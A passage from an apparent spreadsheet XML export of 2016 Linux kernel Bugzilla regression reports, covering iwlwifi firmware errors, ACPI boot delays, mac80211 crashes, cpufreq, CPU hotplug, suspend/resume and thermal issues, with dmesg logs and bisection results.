is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [17623.632953] iwlwifi 0000:03:00.0: Q 24 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [17623.633010] iwlwifi 0000:03:00.0: Q 25 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [17623.633080] iwlwifi 0000:03:00.0: Q 26 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [17623.633155] iwlwifi 0000:03:00.0: Q 27 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [17623.633408] iwlwifi 0000:03:00.0: Q 28 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [17623.633519] iwlwifi 0000:03:00.0: Q 29 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [17623.633758] iwlwifi 0000:03:00.0: Q 30 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [17623.633829] iwlwifi 0000:03:00.0: Microcode SW error detected. Restarting 0x2000000. [17623.633833] iwlwifi 0000:03:00.0: CSR values: [17623.633834] iwlwifi 0000:03:00.0: (2nd byte of CSR_INT_COALESCING is CSR_INT_PERIODIC_REG) [17623.633841] iwlwifi 0000:03:00.0: CSR_HW_IF_CONFIG_REG: 0X40489204 [17623.633854] iwlwifi 0000:03:00.0: CSR_INT_COALESCING: 0X80000040 [17623.633865] iwlwifi 0000:03:00.0: CSR_INT: 0X00000000 [17623.633878] iwlwifi 0000:03:00.0: CSR_INT_MASK: 0X00000000 [17623.633892] iwlwifi 0000:03:00.0: CSR_FH_INT_STATUS: 0X00000000 [17623.633906] iwlwifi 0000:03:00.0: CSR_GPIO_IN: 0X00000000 [17623.633920] iwlwifi 0000:03:00.0: CSR_RESET: 0X00000000 [17623.633931] iwlwifi 0000:03:00.0: CSR_GP_CNTRL: 0X080403c5 [17623.633945] iwlwifi 0000:03:00.0: CSR_HW_REV: 0X00000144 [17623.633958] iwlwifi 0000:03:00.0: CSR_EEPROM_REG: 0X00000000 [17623.633969] iwlwifi 0000:03:00.0: CSR_EEPROM_GP: 0X80000000 [17623.633980] iwlwifi 0000:03:00.0: CSR_OTP_GP_REG: 0X803a0000 [17623.633993] iwlwifi 0000:03:00.0: CSR_GIO_REG: 0X001f0042 [17623.634004] iwlwifi 0000:03:00.0: CSR_GP_UCODE_REG: 0X00000000 [17623.634017] iwlwifi 0000:03:00.0: CSR_GP_DRIVER_REG: 0X00000000 [17623.634028] iwlwifi 0000:03:00.0: CSR_UCODE_DRV_GP1: 0X00000000 [17623.634041] iwlwifi 0000:03:00.0: CSR_UCODE_DRV_GP2: 0X00000000 [17623.634052] iwlwifi 0000:03:00.0: CSR_LED_REG: 0X00000060 [17623.634066] iwlwifi 0000:03:00.0: CSR_DRAM_INT_TBL_REG: 0X8841385e [17623.634076] iwlwifi 0000:03:00.0: CSR_GIO_CHICKEN_BITS: 0X27800200 [17623.634090] iwlwifi 0000:03:00.0: CSR_ANA_PLL_CFG: 0Xd55555d5 [17623.634101] iwlwifi 0000:03:00.0: CSR_MONITOR_STATUS_REG: 0X3d0801bd [17623.634115] iwlwifi 0000:03:00.0: CSR_HW_REV_WA_REG: 0X0001001a [17623.634129] iwlwifi 0000:03:00.0: CSR_DBG_HPET_MEM_REG: 0Xffff0010 [17623.634130] iwlwifi 0000:03:00.0: FH register values: [17623.634152] iwlwifi 0000:03:00.0: FH_RSCSR_CHNL0_STTS_WPTR_REG: 0X41482600 [17623.634172] iwlwifi 0000:03:00.0: FH_RSCSR_CHNL0_RBDCB_BASE_REG: 0X04148450 [17623.634185] iwlwifi 0000:03:00.0: FH_RSCSR_CHNL0_WPTR: 0X00000070 [17623.634198] iwlwifi 0000:03:00.0: FH_MEM_RCSR_CHNL0_CONFIG_REG: 0X00801114 [17623.634211] iwlwifi 0000:03:00.0: FH_MEM_RSSR_SHARED_CTRL_REG: 0X000000fc [17623.634224] iwlwifi 0000:03:00.0: FH_MEM_RSSR_RX_STATUS_REG: 0X03030000 [17623.634237] iwlwifi 0000:03:00.0: FH_MEM_RSSR_RX_ENABLE_ERR_IRQ2DRV: 0X00000000 [17623.634250] iwlwifi 0000:03:00.0: FH_TSSR_TX_STATUS_REG: 0X07ff0001 [17623.634264] iwlwifi 0000:03:00.0: FH_TSSR_TX_ERROR_REG: 0X00000000 [17623.634434] iwlwifi 0000:03:00.0: Start IWL Error Log Dump: [17623.634436] iwlwifi 0000:03:00.0: Status: 0x00000000, count: 6 [17623.634437] iwlwifi 0000:03:00.0: Loaded firmware version: 17.352738.0 [17623.634439] iwlwifi 0000:03:00.0: 0x00000084 | NMI_INTERRUPT_UNKNOWN [17623.634440] iwlwifi 0000:03:00.0: 0x00A00230 | trm_hw_status0 [17623.634441] iwlwifi 0000:03:00.0: 0x00000000 | trm_hw_status1 [17623.634443] iwlwifi 0000:03:00.0: 0x00000B30 | branchlink2 [17623.634444] iwlwifi 0000:03:00.0: 0x00016498 | interruptlink1 [17623.634445] iwlwifi 0000:03:00.0: 0x0001D3F6 | interruptlink2 [17623.634446] iwlwifi 0000:03:00.0: 0x00000000 | data1 [17623.634447] iwlwifi 0000:03:00.0: 0x00000080 | data2 [17623.634448] iwlwifi 0000:03:00.0: 0x07030000 | data3 [17623.634450] iwlwifi 0000:03:00.0: 0x8A8152B4 | beacon time [17623.634451] iwlwifi 0000:03:00.0: 0x2AB70D4C | tsf low [17623.634452] iwlwifi 0000:03:00.0: 0x0000002B | tsf hi [17623.634453] iwlwifi 0000:03:00.0: 0x00000000 | time gp1 [17623.634454] iwlwifi 0000:03:00.0: 0x9B2AF2EA | time gp2 [17623.634455] iwlwifi 0000:03:00.0: 0x00000000 | uCode revision type [17623.634456] iwlwifi 0000:03:00.0: 0x00000011 | uCode version major [17623.634458] iwlwifi 0000:03:00.0: 0x000561E2 | uCode version minor [17623.634459] iwlwifi 0000:03:00.0: 0x00000144 | hw version [17623.634460] iwlwifi 0000:03:00.0: 0x40489204 | board version [17623.634461] iwlwifi 0000:03:00.0: 0x103A001C | hcmd [17623.634463] iwlwifi 0000:03:00.0: 0x24022002 | isr0 [17623.634465] iwlwifi 0000:03:00.0: 0x01800000 | isr1 [17623.634467] iwlwifi 0000:03:00.0: 0x0000000A | isr2 [17623.634469] iwlwifi 0000:03:00.0: 0x004174C0 | isr3 [17623.634470] iwlwifi 0000:03:00.0: 0x00000000 | isr4 [17623.634472] iwlwifi 0000:03:00.0: 0x00000110 | last cmd Id [17623.634474] iwlwifi 0000:03:00.0: 0x00000000 | wait_event [17623.634476] iwlwifi 0000:03:00.0: 0x00000080 | l2p_control [17623.634478] iwlwifi 0000:03:00.0: 0x00010030 | l2p_duration [17623.634479] iwlwifi 0000:03:00.0: 0x0000003F | l2p_mhvalid [17623.634480] iwlwifi 0000:03:00.0: 0x000000CE | l2p_addr_match [17623.634481] iwlwifi 0000:03:00.0: 0x00000005 | lmpm_pmg_sel [17623.634482] iwlwifi 0000:03:00.0: 0x15061434 | timestamp [17623.634483] iwlwifi 0000:03:00.0: 0x00347080 | flow_handler [17623.634486] ieee80211 phy0: Hardware restart was requested [17624.046265] iwlwifi 0000:03:00.0: L1 Enabled - LTR Disabled [17624.046534] iwlwifi 0000:03:00.0: L1 Enabled - LTR Disabled [17624.230503] iwlwifi 0000:03:00.0: L1 Enabled - LTR Disabled [17624.230774] iwlwifi 0000:03:00.0: L1 Enabled - LTR Disabled Info from lspci -v: 03:00.0 Network controller: Intel Corporation Wireless 7260 (rev bb) Subsystem: Intel Corporation Dual Band Wireless-AC 7260 Flags: bus master, fast devsel, latency 0, IRQ 31 Memory at f7600000 (64-bit, non-prefetchable) [size=8K] Capabilities: [c8] Power Management version 3 Capabilities: [d0] MSI: Enable+ Count=1/1 Maskable- 64bit+ Capabilities: [40] Express Endpoint, MSI 00 Capabilities: [100] Advanced Error Reporting Capabilities: [140] Device Serial Number f8-16-54-ff-ff-f8-24-1a Capabilities: [14c] Latency Tolerance Reporting Capabilities: [154] Vendor Specific Information: ID=cafe Rev=1 Len=014 &lt;?&gt; Kernel driver in use: iwlwifi Kernel modules: iwlwifi</t>
  </si>
  <si>
    <t>Boot EC requirement - Kernel 4.7 much longer boot compared to 4.4 and 4.6</t>
  </si>
  <si>
    <t>2016-08-21 21:10 UTC</t>
  </si>
  <si>
    <t>jw.hendy</t>
  </si>
  <si>
    <t>2016-12-03 18:43 UTC</t>
  </si>
  <si>
    <t>Created attachment 229601 [details] side by side dmesg comparision where biggest early discrepancies occur Arch Linux recently rolled out 4.7.0, and I noticed my boot time increase dramatically. The lag/pause occurs just after selecting the desired kernel from my syslinux menu, and before it changes the modeline resolution and prompts for my cryptsetup root password. I installed the linux-lts package for Arch (4.4.16) and compared the dmesg outputs, though the speed change was noticed from the last version of 4.6. It was more convenient to try 4.4 since there's a package for it (just want to rule out that it existed in 4.6). I've attached a file showing the three major discrepancies I see. Here's some quick comparisons for reference: ### kernel 4.4.16 $ systemd-analyze Startup finished in 4.683s (kernel) + 7.625s (initrd) + 1.084s (userspace) = 13.393s ### kernel 4.7.0 $ systemd-analyze Startup finished in 10.746s (kernel) + 10.518s (initrd) + 4.060s (userspace) = 25.325s Biggest differences happen during these chunks of the boot process, both involving ACPI : EC. The first accounts for a ~1sec difference: ### kernel 4.4.16 [ 0.279066] ACPI : EC: EC started [ 4.418531] ACPI: Interpreter enabled ### kernel 4.7.0 [ 0.279066] ACPI : EC: EC started [ 4.418531] ACPI: Interpreter enabled The second is a stop/start of EC which adds another 6sec to 4.7.0: ### kernel 4.4.16 [ 4.528033] ACPI: Enabled 7 GPEs in block 00 to 3F [ 4.528068] ACPI : EC: GPE = 0x16, I/O: command/status = 0 [ 4.528134] vgaarb: setting as boot device: PCI:0000:00:02 ### kernel 4.7.0 [ 5.711566] ACPI: Enabled 7 GPEs in block 00 to 3F [ 5.711639] ACPI : EC: EC stopped [ 5.711667] ACPI : EC: GPE = 0x16, I/O: command/status = 0 [ 5.711668] ACPI : EC: EC started [ 10.526295] vgaarb: setting as boot device: PCI:0000:00:02 I have a post on the Arch Linux forums about this as well (in case others comment there): - https://bbs.archlinux.org/viewtopic.php?id=216096 I also found another user on Reddit reporting what appears to be similar: - https://www.reddit.com/r/linuxquestions/comments/4yok1c/slow_kernel_boot_acpi_ec/ The laptop is an HP Zbook 15 running x86_64. I *believe* this is related to ACPI as that's where the first 1sec jump occurs, and the later big 6sec leap surrounds ACPI lines as well. That said, the first line *after* the time jump relates to vgaarb, so if you think the bug is really about that, please let me know and I can re-submit elsewhere.</t>
  </si>
  <si>
    <t>mac80211 crash under monitoring</t>
  </si>
  <si>
    <t>2016-08-25 20:25 UTC</t>
  </si>
  <si>
    <t>Kamil Toman</t>
  </si>
  <si>
    <t>2016-08-30 06:00 UTC</t>
  </si>
  <si>
    <t>System went unresponsive under a monitored networking operation: Aug 25 21:25:18 oryx kernel: [ 400.464843] NMI watchdog: BUG: soft lockup - CPU#0 stuck for 22s! [wpa_supplicant:4260] Aug 25 21:24:50 oryx kernel: [ 372.764887] ------------[ cut here ]------------ Aug 25 21:24:50 oryx kernel: [ 372.764940] WARNING: CPU: 0 PID: 4260 at net/mac80211/util.c:2847 ieee80211_chandef_downgrade+0x40/0x160 [mac80211] Aug 25 21:24:50 oryx kernel: [ 372.764944] Modules linked in: bnep vmnet(OE) vmw_vsock_vmci_transport vsock vmw_vmci vmmon(OE) drbg ansi_cprng ctr ccm ipt_MASQUERADE nf_nat_masquerade_ipv4 iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 xt_addrtype iptable_filter ip_tables xt_conntrack x_tables nf_nat nf_conntrack br_netfilter bridge stp llc overlay ec_sys binfmt_misc nls_iso8859_1 snd_hda_codec_hdmi mxm_wmi arc4 intel_rapl x86_pkg_temp_thermal intel_powerclamp coretemp kvm_intel kvm snd_hda_codec_realtek irqbypass snd_hda_codec_generic crct10dif_pclmul crc32_pclmul ghash_clmulni_intel aesni_intel snd_hda_intel aes_x86_64 lrw gf128mul glue_helper snd_hda_codec ablk_helper cryptd snd_hda_core snd_hwdep snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_v4l2 videobuf2_core rtsx_pci_ms input_leds iwlmvm joydev videodev memstick snd_seq mac80211 media snd_seq_device snd_timer serio_raw iwlwifi cfg80211 mei_me snd soundcore mei shpchp nvidia_uvm(POE) hci_uart btbcm wmi btqca btintel bluetooth intel_lpss_acpi intel_lpss acpi_pad mac_hid parport_pc ppdev lp parport autofs4 btrfs xor raid6_pq dm_mirror dm_region_hash dm_log hid_generic usbhid rtsx_pci_sdmmc nvidia_drm(POE) nvidia_modeset(POE) drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops drm psmouse nvidia(POE) nvme r8169 nvme_core rtsx_pci ahci mii libahci pinctrl_sunrisepoint i2c_hid video pinctrl_intel hid fjes Aug 25 21:24:50 oryx kernel: [ 372.765089] CPU: 0 PID: 4260 Comm: wpa_supplicant Tainted: P OE 4.6.4-katox #2 Aug 25 21:24:50 oryx kernel: [ 372.765092] Hardware name: System76, Inc. Oryx Pro/Oryx Pro, BIOS 1.05.09RSA1 11/16/2015 Aug 25 21:24:50 oryx kernel: [ 372.765096] 0000000000000286 0000000048d9dce9 ffff88084ca93840 ffffffff813ede93 Aug 25 21:24:50 oryx kernel: [ 372.765102] 0000000000000000 0000000000000000 ffff88084ca93880 ffffffff8108184b Aug 25 21:24:50 oryx kernel: [ 372.765108] 00000b1fc1034392 ffff88084ca938c0 ffff88084eae4000 ffff880851e90840 Aug 25 21:24:50 oryx kernel: [ 372.765113] Call Trace: Aug 25 21:24:50 oryx kernel: [ 372.765124] [&lt;ffffffff813ede93&gt;] dump_stack+0x63/0x90 Aug 25 21:24:50 oryx kernel: [ 372.765131] [&lt;ffffffff8108184b&gt;] __warn+0xcb/0xf0 Aug 25 21:24:50 oryx kernel: [ 372.765137] [&lt;ffffffff8108197d&gt;] warn_slowpath_null+0x1d/0x20 Aug 25 21:24:50 oryx kernel: [ 372.765174] [&lt;ffffffffc1123cd0&gt;] ieee80211_chandef_downgrade+0x40/0x160 [mac80211] Aug 25 21:24:50 oryx kernel: [ 372.765216] [&lt;ffffffffc1143595&gt;] ieee80211_tdls_chandef_vht_upgrade+0x105/0x1f0 [mac80211] Aug 25 21:24:50 oryx kernel: [ 372.765254] [&lt;ffffffffc11442e4&gt;] ieee80211_tdls_build_mgmt_packet_data+0xa44/0x1090 [mac80211] Aug 25 21:24:50 oryx kernel: [ 372.765290] [&lt;ffffffffc114537f&gt;] ieee80211_tdls_prep_mgmt_packet.constprop.7+0xaf/0x2c0 [mac80211] Aug 25 21:24:50 oryx kernel: [ 372.765322] [&lt;ffffffffc1145904&gt;] ieee80211_tdls_mgmt+0x2e4/0x4c0 [mac80211] Aug 25 21:24:50 oryx kernel: [ 372.765355] [&lt;ffffffffc1019942&gt;] nl80211_tdls_mgmt+0x132/0x240 [cfg80211] Aug 25 21:24:50 oryx kernel: [ 372.765364] [&lt;ffffffff817609bb&gt;] genl_family_rcv_msg+0x1db/0x3b0 Aug 25 21:24:50 oryx kernel: [ 372.765371] [&lt;ffffffff81713cb3&gt;] ? skb_queue_tail+0x43/0x50 Aug 25 21:24:50 oryx kernel: [ 372.765377] [&lt;ffffffff8175d24e&gt;] ? __netlink_sendskb+0x3e/0x60 Aug 25 21:24:50 oryx kernel: [ 372.765384] [&lt;ffffffff81760b90&gt;] ? genl_family_rcv_msg+0x3b0/0x3b0 Aug 25 21:24:50 oryx kernel: [ 372.765390] [&lt;ffffffff81760c06&gt;] genl_rcv_msg+0x76/0xb0 Aug 25 21:24:50 oryx kernel: [ 372.765396] [&lt;ffffffff81760114&gt;] netlink_rcv_skb+0xa4/0xc0 Aug 25 21:24:50 oryx kernel: [ 372.765401] [&lt;ffffffff817607c8&gt;] genl_rcv+0x28/0x40 Aug 25 21:24:50 oryx kernel: [ 372.765407] [&lt;ffffffff8175faf3&gt;] netlink_unicast+0x183/0x230 Aug 25 21:24:50 oryx kernel: [ 372.765413] [&lt;ffffffff8175fe9b&gt;] netlink_sendmsg+0x2fb/0x3a0 Aug 25 21:24:50 oryx kernel: [ 372.765421] [&lt;ffffffff8170ce68&gt;] sock_sendmsg+0x38/0x50 Aug 25 21:24:50 oryx kernel: [ 372.765428] [&lt;ffffffff8170d91e&gt;] ___sys_sendmsg+0x28e/0x2a0 Aug 25 21:24:50 oryx kernel: [ 372.765433] [&lt;ffffffff813f6e92&gt;] ? memzero_explicit+0x12/0x20 Aug 25 21:24:50 oryx kernel: [ 372.765440] [&lt;ffffffff8151c7ec&gt;] ? extract_entropy_user+0x11c/0x1b0 Aug 25 21:24:50 oryx kernel: [ 372.765448] [&lt;ffffffff81236153&gt;] ? dput+0xb3/0x220 Aug 25 21:24:50 oryx kernel: [ 372.765454] [&lt;ffffffff8123f814&gt;] ? mntput+0x24/0x40 Aug 25 21:24:50 oryx kernel: [ 372.765460] [&lt;ffffffff812204e3&gt;] ? __fput+0x193/0x230 Aug 25 21:24:50 oryx kernel: [ 372.765464] [&lt;ffffffff8170e274&gt;] __sys_sendmsg+0x54/0x90 Aug 25 21:24:50 oryx kernel: [ 372.765469] [&lt;ffffffff8170e2c2&gt;] SyS_sendmsg+0x12/0x20 Aug 25 21:24:50 oryx kernel: [ 372.765477] [&lt;ffffffff818385b6&gt;] entry_SYSCALL_64_fastpath+0x1e/0xa8 Aug 25 21:24:50 oryx kernel: [ 372.765481] ---[ end trace e487d8b0f5c0eff6 ]---</t>
  </si>
  <si>
    <t>x86: cr4 manipulation regression</t>
  </si>
  <si>
    <t>3.18.17</t>
  </si>
  <si>
    <t>2016-09-21 13:54 UTC</t>
  </si>
  <si>
    <t>2016-10-06 08:43 UTC</t>
  </si>
  <si>
    <t>A regression have appeared with kernel 3.18.17 in CR4 manipulation code. This kernel don't boot on a VSX-6115-V2 board using a Vortex86SX-300MHz CPU. processor : 0 vendor_id : CyrixInstead cpu family : 4 model : 1 model name : Cx486SLC stepping : unknown fdiv_bug : no f00f_bug : no coma_bug : no fpu : no fpu_exception : no cpuid level : -1 wp : yes flags : bogomips : 95.84 clflush size : 32 cache_alignment : 32 address sizes : 32 bits physical, 32 bits virtual power management: Kernel bisection start on v3.18.16: Bisecting: 22 revisions left to test after this (roughly 5 steps) [8c8e709d1b1b76b2dcd54b47fe087fd5e622ea3b] vti6: fix uninit when using x-netns Bisecting: 11 revisions left to test after this (roughly 4 steps) [8db8f8f39c21d93bb50de6a4e12ad1aea21411ef] selinux/nlmsg: add XFRM_MSG_MAPPING Bisecting: 5 revisions left to test after this (roughly 3 steps) [0fee5a3955ed36b15db56c77c0e316b9ecf8c93f] dmaengine: shdmac: avoid unused variable warnings Bisecting: 2 revisions left to test after this (roughly 2 steps) [63753fac67e11fb6bac3d5c6a48bd319d9e612c2] x86: Store a per-cpu shadow copy of CR4 Bisecting: 0 revisions left to test after this (roughly 1 step) [8ca6fadf220ab0a1369a667462d8d8c0c5d6ac29] x86: Clean up cr4 manipulation</t>
  </si>
  <si>
    <t>Reduced frequency window for conservative governor</t>
  </si>
  <si>
    <t>2016-10-10 15:43 UTC</t>
  </si>
  <si>
    <t>Aleksey Rybalkin</t>
  </si>
  <si>
    <t>2016-10-14 23:43 UTC</t>
  </si>
  <si>
    <t>linux-pm@vger.kernel.org</t>
  </si>
  <si>
    <t>Hello. Since 4.8 the conservative governor has a reduced frequency window on my machine (ThinkPad X250), despite correct values for scaling_{min,max}_freq $ cat /sys/devices/system/cpu/cpufreq/policy0/scaling_{min,max}_freq 500000 2200000 The actual window became from 2000000 to 2200000 with accordingly more heating and more cpu fan activations, which is not optimal. I have bisected the problem to this commit: commit d352cf47d93e39494b44b792cca8d35a3a0bd9b3 Author: Rafael J. Wysocki &lt;rafael.j.wysocki@intel.com&gt; Date: Mon Jun 13 23:33:49 2016 +0200 cpufreq: conservative: Do not use transition notifications The conservative governor registers a transition notifier so it can update its internal requested_freq value if it falls out of the policy-&gt;min...policy-&gt;max range, but requested_freq is not really necessary. That value is used to track the frequency requested by the governor previously, but policy-&gt;cur can be used instead of it and then the governor will not have to worry about updating the tracked value when the current frequency changes independently (for example, as a result of min or max changes). Accodringly, drop requested_freq from struct cs_policy_dbs_info and modify cs_dbs_timer() to use policy-&gt;cur instead of it. While at it, notice that __cpufreq_driver_target() clamps its target_freq argument between policy-&gt;min and policy-&gt;max, so the callers of it don't have to do that and make additional changes in cs_dbs_timer() in accordance with that. After these changes the transition notifier used by the conservative governor is not necessary any more, so drop it, which also makes it possible to drop the struct cs_governor definition and simplify the code accordingly. Signed-off-by: Rafael J. Wysocki &lt;rafael.j.wysocki@intel.com&gt; Acked-by: Viresh Kumar &lt;viresh.kumar@linaro.org&gt;</t>
  </si>
  <si>
    <t>[BYT-M/BSW-M] Kernel panic after doing hot CPU offline</t>
  </si>
  <si>
    <t>mainline v4.9-rc1</t>
  </si>
  <si>
    <t>2016-10-20 06:46 UTC</t>
  </si>
  <si>
    <t>wendy.wang</t>
  </si>
  <si>
    <t>2016-10-21 08:50 UTC</t>
  </si>
  <si>
    <t>Created attachment 242031 [details] call trace1 This is V4.9-rc1 mainline kernel regression: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git V4.8 mainline kernel did not reproduce this issue. Failed platforms: Platform: Braswell M Lenovo B41-30 CPU : Intel(R) CPU @ N3150 1.6GHz Software Linux distribution: Ubuntu 16.04 LTS 64 bits BIOS : C5CN27WW(v.03) Ksc : C5EC27WW(v.03) Platform: Baytrail Mobile (Lenovo G40 N2930) Platform: LenovoG40-30N29304G500G8C CPU: N2930 1.83GHz 4Cores/4Thread lspci:ValleyView Gen7 [8086:0f31] (rev 0e) Software Linux distribution: Ubuntu 14.04.4 LTS 64 bits BIOS: A7CN25WW EC : A7EC25WW Reproduce steps: 1. Boot into Kernel v4.9-rc1 2. do CPU hot offline, we make sure every CPU cores are working normally before offline. 3. echo 0 &gt; /sys/devices/system/cpu/cpu1/online, take CPU1 only for example, other CPU2 and CPU3 hot online also will trigger bug. 4. after hot offline the CPU1~3, System will report panic (pls refer to attached error picture.), and system hang up.</t>
  </si>
  <si>
    <t>[regression] Auto serialize mechanism is disabled</t>
  </si>
  <si>
    <t>4.9-rc1</t>
  </si>
  <si>
    <t>2016-10-24 07:29 UTC</t>
  </si>
  <si>
    <t>2016-11-07 21:07 UTC</t>
  </si>
  <si>
    <t>From: Deak, Imre &lt;imre.deak@intel.com&gt; after upgrading to 4.9-rc1 I get the following errors occasionally during boot and suspend-to-ram on an APL system: [ 59.513434] ACPI Error: [TMP_] Namespace lookup failure, AE_ALREADY_EXISTS (20160831/dswload2-330) [ 59.513446] ACPI Exception: AE_ALREADY_EXISTS, During name lookup/catalog (20160831/psobject-227) [ 59.513469] ACPI Error: Method parse/execution failed [\_SB.PCI0.SCPG] (Node ffff8802770b7bb8), AE_ALREADY_EXISTS (20160831/psparse-543) [ 59.515415] ACPI Error: Method parse/execution failed [\_SB.PCI0.SDHA._PS3] (Node ffff8802770b7dc0), AE_ALREADY_EXISTS (20160831/psparse-543) [ 59.517118] ACPI: Marking method _PS3 as Serialized because of AE_ALREADY_EXISTS error Other than these error messages, booting and suspend/resume seems to work ok. Bisecting points to commit 74f51b80a0c4ff84fbeb7f12ea43ce66934d29aa Author: Lv Zheng &lt;lv.zheng@intel.com&gt; Date: Wed Sep 7 14:07:10 2016 +0800 ACPICA: Namespace: Fix dynamic table loading issues Reverting this on top of 4.9-rc1 gets rid of the error messages.</t>
  </si>
  <si>
    <t>Resume from suspend no longer works on Thinkpad X240</t>
  </si>
  <si>
    <t>4.9.0-rc1</t>
  </si>
  <si>
    <t>2016-10-24 20:28 UTC</t>
  </si>
  <si>
    <t>2016-11-17 00:49 UTC</t>
  </si>
  <si>
    <t>Hi, I have a Thinkpad X240, which suspends (to RAM) and resumes just fine with 4.7.4. However, in 4.9.0-rc1, it completely refuses to resume; when I try to press the power button to resume it from sleep, it just ignores the request completely and keeps pulsing the light. bisect gives the following culprit: commit 0c541332231e7957f23013e37f3720db33e7804c Author: Jarkko Sakkinen &lt;jarkko.sakkinen@linux.intel.com&gt; Date: Fri Jun 17 13:12:20 2016 +0200 tpm: use tpm_pcr_read_dev() in tpm_do_selftest() Instead of a ad-hoc protocol message construction it is better to call tpm_pcr_read_dev(). Signed-off-by: Jarkko Sakkinen &lt;jarkko.sakkinen@linux.intel.com&gt; Reviewed-by: Jason Gunthorpe &lt;jgunthorpe@obsidianresearch.com&gt; I haven't tried 4.9.0-rc2, because that just hangs directly off of GRUB from me.</t>
  </si>
  <si>
    <t>Poweroff and reboot hungs the PC with screen off and leds blinking on Latitude E7250</t>
  </si>
  <si>
    <t>4.9.0-rc4</t>
  </si>
  <si>
    <t>2016-11-06 10:55 UTC</t>
  </si>
  <si>
    <t>Gianpaolo</t>
  </si>
  <si>
    <t>2016-12-06 14:25 UTC</t>
  </si>
  <si>
    <t>Ocean He</t>
  </si>
  <si>
    <t>Created attachment 243731 [details] Screenshot just before hanging When doing a poweroff or a reboot the PC stops for a few seconds, apparently at the very end of the process, then it hungs. Screen is blank but leds (disk, power and wifi) blink. I compile the vanilla kernel myself (and the attached files refers to my kernel) but the same problem affects all the kernels I tested, including the original 4.8.0 deloivered with debian SID, and kernel 4.8 delivered with Ubuntu 16.10. I am attaching a screenshot of the console during the seconds of waiting just before the screen goes blank and the leds start blinking. I am also attaching dmesg result with the last running kernel (4.7.10) and with the latest 4.9.0-rc4 kernel. Any help on how to further analyze the source of the bug is welcome. Gianpaolo</t>
  </si>
  <si>
    <t>Lid does not "open" after suspend to RAM  - Razer Blade Stealth 2016</t>
  </si>
  <si>
    <t>4.8.6-1-ARCH</t>
  </si>
  <si>
    <t>2016-11-08 04:20 UTC</t>
  </si>
  <si>
    <t>kobrient</t>
  </si>
  <si>
    <t>2016-11-23 02:59 UTC</t>
  </si>
  <si>
    <t>My system is set up to suspend to ram on a lid close event. The lid state transitions from "open" to "closed" correctly the first time (and the system suspends), but after resuming from suspend by opening the lid, the lid state does not change back to "open". Needless to say, closing the lid once again does not induce a suspend. Opening the lid now, while the system is NOT sleeping, causes ACPI to notice and register the "open" event. Closing the lid once more successfully suspends the machine again. The behavior is reproducible every other attempt. Everything seems to indicate that ACPI drops or discards the lid open event from the EC when coming up from sleep. If I run `acpi_listen` with all lid events disabled (no suspend action), I see both the "open" and "close" events successfully recorded multiple times. It is only when I successfully suspend to ram then try to wake that my lid "open" event gets dropped. The problem is very similar to this issue documented on LKML in 2014: https://lkml.org/lkml/2014/3/25/196 I am reading the lid state from /proc/acpi/button/lid/LID0/state and using acpid to set up and test lid open/close triggers. If lends any credence to the story, the Arch linux wiki seems to agree with me: https://wiki.archlinux.org/index.php/Razer#Suspend_Loop **Note that their "workaround" here does not actually solve the problem.</t>
  </si>
  <si>
    <t>thinkpad x60:Thermal shutdown</t>
  </si>
  <si>
    <t>4.9-rc2</t>
  </si>
  <si>
    <t>2016-11-08 18:35 UTC</t>
  </si>
  <si>
    <t>2016-11-24 09:33 UTC</t>
  </si>
  <si>
    <t>Created attachment 243951 [details] thermal zone dump Thinkpad x60 dmesg is showing [14049.733423] thinkpad_acpi: THERMAL EMERGENCY: a sensor reports something is extremely hot! This eventually causes thermal shutdown. Thinkpad x60 has a regression compared to v4.8-rc1 where CPU was forced to run at lower frequency with some stress workload like kernel compile. With 4.8-rc1 ..................... The bios_limit is changed with high temperature /sys/devices/system/cpu/cpu0/cpufreq/bios_limit:1000000 /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq:1833000 /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_min_freq:1000000 /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq:1000000 /sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq:1000000 ------------ 4.9-rc2 The BIOS limit always stays high irrespective of temperature. sudo watch cat /proc/acpi/ibm/thermal /sys/devices/system/cpu/cpu0/cpufreq/bios_limit /sys/devices/virtual/thermal/thermal_zone1/temp /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_cur_freq temperatures: 98 49 -128 85 28 -128 28 -128 49 58 -128 -128 -128 -128 -128 -128 1833000 95000 1833000</t>
  </si>
  <si>
    <t>duplicate</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Subject : [Linux 2.6.29_rc2] Undefined symbols when CONFIG_MFD_PCF50633 is enabled Submitter : Ozan Ça</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>ğ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>layan &lt;ozan@pardus.org.tr&gt; Date : 2009-01-17 10:56 References : http://marc.info/?l=linux-kernel&amp;m=123218991104592&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
    </r>
  </si>
  <si>
    <r>
      <t>[PATCH]PROBLEM:Unsafe dereference of pointer after allocing memory</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>‏‏</t>
    </r>
  </si>
  <si>
    <t>2003-10-26 07:52 UTC</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
